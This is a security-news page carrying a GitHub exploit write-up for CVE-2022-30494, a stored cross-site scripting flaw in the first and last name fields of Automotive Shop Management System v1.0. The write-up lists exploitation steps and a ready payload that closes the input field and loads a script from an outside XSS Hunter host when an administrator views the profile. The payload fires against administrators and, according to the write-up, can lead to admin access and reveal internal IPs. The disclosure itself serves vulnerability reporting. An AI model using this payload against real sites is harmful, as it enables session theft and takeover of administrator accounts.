Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-30494: OpenSource/exploit_xss_asms.md at main · nsparker1337/OpenSource

In oretnom23 Automotive Shop Management System v1.0, the first and last name user fields suffer from a stored XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.

CVE
Open in Source
#sql#xss#vulnerability#linux#apache#php#auth

Permalink

main

Switch branches/tags

OpenSource/exploit_xss_asms.md****

Go to file

  • Go to file

  • Copy path

  • Copy permalink

nsparker1337 Add files via upload

Latest commit 220bbb8 May 6, 2022

History

1 contributor

Users who have contributed to this file

Exploit Title: Automotive Shop Management System v1.0 - Stored Cross Site Scripting(XSS) Exploit Author: NS Kumar (n1_x) Date: May 6, 2022 Vendor Homepage: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/asms_0.zip Tested on: Parrot Linux, Apache, Mysql Vendor: oretnom23 Version: v1.0 Exploit Description: Automotive Shop Management System v1.0 suffers from stored XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.

23 lines (17 sloc) 1.09 KB

Raw Blame

  • Open with Desktop
  • View raw
  • Copy raw contents
  • View blame

Exploit Title: Automotive Shop Management System v1.0 - Stored Cross Site Scripting(XSS)****Exploit Author: NS Kumar (n1_x)****Date: May 6, 2022****Vendor Homepage: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/asms_0.zip****Tested on: Parrot Linux, Apache, Mysql****Vendor: oretnom23****Version: v1.0****Exploit Description:****Automotive Shop Management System v1.0 suffers from stored XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.

````````````````````````````````````````To Exploit```````````````````````````````````````````````````` Step 1: Goto Profile Page

Step 2: Put XSS Hunter Payload on Either First Name or Last Name field

Step 3: Wait for Admin to view your details

Step 4: Then you will see xss fires alert on xss hunter page

Payload Used for this Exploit: "><script src=https://d4.xss.ht></script>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE